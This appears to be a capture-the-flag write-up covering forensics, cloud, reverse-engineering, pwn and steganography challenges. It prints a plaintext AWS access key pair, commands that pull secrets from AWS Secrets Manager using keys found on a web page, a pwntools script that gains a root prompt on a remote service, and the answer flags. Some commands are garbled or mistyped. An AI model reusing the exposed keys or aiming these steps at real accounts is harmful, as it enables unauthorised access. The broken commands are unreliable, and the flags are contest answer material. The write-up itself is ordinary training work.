Download and unzip the file you can see a vmdk file which is a tar file under the hood you can open them in 7z GUI or any other archive viewer just exploring through the file we can see a flag.txt open it and get the flag
Forensics/Breach Analysis
I written a helper function for all pcap related challenges
from scapy.all import rdpcap
pcap_file = 'Network_Breach.pcap'
output_file = 'Network_Breach.txt'
packets = rdpcap(pcap_file)
with open(output_file, 'wb') as f:
for packet in packets:
if packet.haslayer('Raw'):
payload = packet.getlayer('Raw').load
f.write(payload+b"\n")
print(f"Transferred data has been written to {output_file}")
using this i got the data from the pcap it has a drive link
USB activity data Mk4DNvxppbL6kgpDFwi9DjE1jVbuaQZh3eXrybLicW9AAUILmimQ3x9iQhSet7MCGdUjv9J683mynN1KLARsfrY5I4Eb7zvrouXMeyB9jXLS9povDvUVq1WRguXWBNXVwzJNUitaWI08gvtNAdpK
USB info: Product ID, Vendor ID
Finding for USB Pcap?: https://drive.google.com/file/d/1W_1ugLMKXAms61I_a8gyJF5FDI9IeXoy/view?usp=sharing
1FuwHIYaXzGBtvb2sSVZ930enwIKpsgsXyr9HQT2OQj8bcxbEBgrxrNzxQdAKuD8HVbjGvSThlNjFk4bVKij7hXtfIyJRn8iyzIDSWn58HI4v0BTNUkqdSY4izL7urD
found another pcap file using same script to get the contents of it it had binary data so i extracted only strings so there i can see a base 64 string
USB PCAP files can uncover anomalies that may indicate malicious activity, such as unauthorized data exfiltration or device tampering. It's interesting to note that within these packets, one might encounter encoded strings or other forms of hidden data.
during your a detailed examination, might come across something like """"- ZmxhZ3s5YjY2OWUyNi02N2RlLTQ2ZGYtOThjNy0yMzg3ZTk1MzNhNzJ9 -""""
decoding it got the flag flag{9b669e26-67de-46df-98c7-2387e9533a72}
Forensics/Secret Messages
It had 2 packets given so i extracted data using the above script found some clues
extracted text is as follows i removed some parts
noise_packet_774
insider_ip = "192.168.1.5"
noise_packet_367
......................
noise_packet_843
random_data_1 = "Lorem ipsum dolor sit amet"
noise_packet_345
noise_packet_153
false_flag = "flag{this_is_not_the_flag}"
noise_packet_67
another_ip = "192.168.2.10"
import uuid
noise_packet_173
noise_packet_473
message = ""
......................
noise_packet_579
junk_variable = 1234567890
......................
noise_packet_635
extra_data = "Nothing to see here"
noise_packet_236
attacker_ip = "10.0.0.42"
useless_string = "This is just a distraction"
flag_uuid = uuid.uuid5(uuid.NAMESPACE_DNS, combined_string)
print(f"flag{{{flag_uuid}}}")
dummy_ip = "172.16.0.1"
combined_string = f"{message}_{insider_ip}_{attacker_ip}"
Rearranging the above python code we can see
import uuid
another_ip = "192.168.2.10"
attacker_ip = "10.0.0.42"
message = ""
insider_ip = "192.168.1.5"
combined_string = f"{message}_{insider_ip}_{attacker_ip}"
flag_uuid = uuid.uuid5(uuid.NAMESPACE_DNS, combined_string)
print(f"flag{{{flag_uuid}}}")
flag{d6f3b956-e5f7-588d-a1d9-65a6aa0cc3d3}
Cloud/Stealth Secret
i configure the keys with profile name stealth
aws iam get-account-authorization-details --profile stealth
we can see an ip 3.109.115.126 if we go to this ip we can see some website if i inspect i can see other set of access key and tokens i configured them as secret
aws secretsmanager list-secrets
by this we can see ARN of the resources
aws secretsmanager get-secret-value --secret-id arn:aws:secretsmanager:ap-south-1:236706384121:secret:flagString-GjzPLY
We will get the flag
Cloud/shuffle-trouble
get the image cyberseciitjammu/ubuntu1:master run it and check files we can see a docker compose file
version: '3'
services:
container1:
image: cyberseciitjammu/shuffle-trouble:lts1
container_name: container1
command: ["tail", "-f", "/dev/null"]
# Add any additional configuration for container 1 if needed
# A seasonal fashion statement named for the weather it's worn in.
container2:
image: cyberseciitjammu/shuffle-trouble:lts2
container_name: container2
command: ["tail", "-f", "/dev/null"]
# Add any additional configuration for container 2 if needed
container3:
image: cyberseciitjammu/shuffle-trouble:lts3
container_name: container3
command: ["tail", "-f", "/dev/null"]
# Add any additional configuration for container 3 if needed
container4:
image: cyberseciitjammu/shuffle-trouble:lts4
container_name: container4
command: ["tail", "-f", "/dev/null"]
now if we do docker compose up we all containers have started we can run a shell in each one of them to find clues all images have a .bash_history file in home folder which has a file name .bash_history in that if we cat it we can see some file in /lib/sudoers like lts1 has file lts2 has file2 after opening it we can see a riddle
A seasonal fashion statement named for the weather
answer is sundress
if we get a shell in cyberseciitjammu/shuffle-trouble:lts4 we can see a /home/flag.zip
unzip it with the password as sundress
flag{488ce608-1b21-11ef-a322-6278de2bf573}
Rev/praarambh
if (((arg2 + arg1) != 0x776 || ((arg2 + arg1) == 0x776 && (arg1 * arg2) != 0xde589)))
{
rax_10 = 0;
}
if (((arg2 + arg1) == 0x776 && (arg1 * arg2) == 0xde589))
{
int32_t rax_5 = (arg1 - arg2);
if ((arg1 & 1) == 0)
{
sub_1169(0, 0);
/* no return */
}
if ((arg2 & 1) == 0)
{
sub_1169(0, 0);
/* no return */
}
rax_10 = ((uint64_t)rax_5);
}
return rax_10;
if this function returns 0 then we will get the flag arg1 and arg2 are input numbers which we are giving
x + y == 1910
x * y == 910729
(x - y)**2 = (x+y)**2 - 4xy
x - y = 72
x = 991
y = 919
flag{788b034a-1655-40b4-a345-0e6f67270ea3}
PWN/saviour
from pwn import *
exe = ELF("./saviour")
context.binary = exe
#elf = exe.process()
elf = remote('anveshanam.net', 10113)
elf.sendline(b'1')
elf.sendlineafter(b': ', b'aaaa')
elf.sendline(b'3')
elf.sendline(b'2')
elf.sendlineafter(b': ', "root")
elf.sendline(b'4')
elf.interactive()
stdbuf -o0 -i0 python3 saviour.py
Steg/Ghost Hunter
Unzip the file and get the exif data
ExifTool Version Number : 12.57
File Name : img1.jpg
Directory : ghost
File Size : 66 kB
File Modification Date/Time : 2024:06:26 02:15:05+05:30
File Access Date/Time : 2024:06:26 10:46:20+05:30
File Inode Change Date/Time : 2024:06:26 02:23:37+05:30
File Permissions : -rwxr--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Comment : 1111101011011110
Image Width : 471
Image Height : 640
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 471x640
Megapixels : 0.301
Comment has 1111101011011110
>>> 0b1111
15
>>> 0b1010
10
>>> 0b1101
13
>>> 0b1110
14
from this i got PKNO and rotating the characters i got a word FADE
steghide extract -sf img1.jpg
password for steghide is FADE and flag is flag{862023bc-ba5f-49d9-a91f-c2b6bd7cf8f7}
Forensics/deep
run binwalk on walk.bin and we can see it has some files now we have to extract the data after extracting the data with
binwalk -e walk.bin
now inside we can see some zlib files now i can’t open it and tried using binwalk it doesn’t work so in some writeup some one was using a tool called foremost i used it to extract using
foremost -i iitj_ctf.zlib
there is a backup upon opening it i can see a gif with password
ajfqv3021mf-b9dj312kd0-3nac322p
we can also see a gpg file so decrypting it i got the flag
flag{6f1058cb-519a-432c-8624-e56dd87b1493
Cloud/flag_secure
configure AWS with the keys below
Access key ID: AKIAXYKJWJWPLBEKDINJ Secret access key: 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
aws secretsmanager list-secrets --profile flag_secure
aws secretsmanager get-secret-value --sccret-id arn:aws:secretsmanager:ap-south-1:533267369374:secret:question5_secret-205EPt --profile flag_secure
you can see a ip here 13.126.13.157
aws describe-db-clusters --profile flag_secure
we can see some credentials, if we login using that credentials in the above ip, we will get a drive link
drive.google.com/file/d/1vbYxdMw4f0jmxtVWy8FAmg7NiFVK-6Bz/view
it has some exe files game.exe, alpha.exe, beta.exe
looks like all should run simultaneously to get the flag this script will run the alpha, beta exe files and in my terminal when i run game.exe i got the flag
import subprocess
while True:
print(subprocess.check_output("alpha.exe", shell=True))
print(subprocess.call("beta.exe", shell=True))
gama.exe
beta.exe is running! your flag is flag{66fc242a-0878-67ed-a833-02b57911dbd6}
Forensics/shebang
Volatility 3 CheatSheet - onfvpBlog [Ashley Pearson] https://drive.google.com/file/d/1SUxO6jFbvLZmPEN1qRsiVFG4gSJzBGcH/view?usp=sharing
After downloading and unzipping it we can see a dlt.raw file
Commands to get the flag
vol.py dlt.raw imageinfo
vol.py -f dlt.raw --profile=Win75POx6l filescan | grep -i recycle
vol.py -f dlt.raw --profile=Win75P0x64 dumpfiles -Q 0x000000007fdafac0 -D ./files
in the directory /files we can see some file after seeing the content we know that there is a another text file which is frank.txt.txt
vol.py -f dlt.raw --profile=Win7SPOx64 filescan | grep frank
vol.py -f dlt.raw --profile=Win75P0xcl dumpfiles -Q 0x000000007d8e6f20 -D./files
if we cat the new file we can see 019c4fb7-4209-45fd-96e0-b4ffb4d64886
flag{019c4fb7-4209-45fd-96e0-b4ffb4d64886}